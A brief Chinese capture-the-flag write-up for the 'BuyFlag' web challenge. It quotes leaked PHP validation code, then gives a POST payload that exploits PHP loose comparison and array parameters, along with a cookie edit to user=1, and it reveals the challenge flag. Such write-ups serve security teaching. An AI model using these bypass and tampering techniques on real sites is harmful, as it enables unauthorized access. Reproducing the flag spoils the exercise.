3X01题目-[极客大挑战 2019]BuyFlag
拿到网站F12检查发现了pay.php和index.php
pay.php是要去买flag:
接着在注释里发现了一段php代码:
<!--
~~~post money and password~~~
if (isset($_POST['password'])) {
$password = $_POST['password'];
if (is_numeric($password)) {
echo "password can't be number</br>";
}elseif ($password == 404) {
echo "Password Right!</br>";
}
}
-->
打开我的hackbar进行POST传参,
password=404asd&money[]=1
并修改cookie:user=1
这样就购买flag成功了
flag{f35a2816-1c80-4dfc-bf9b-8266d2603d19}
注:
数值太长可以用科学计数法,也可以用mongey[]=123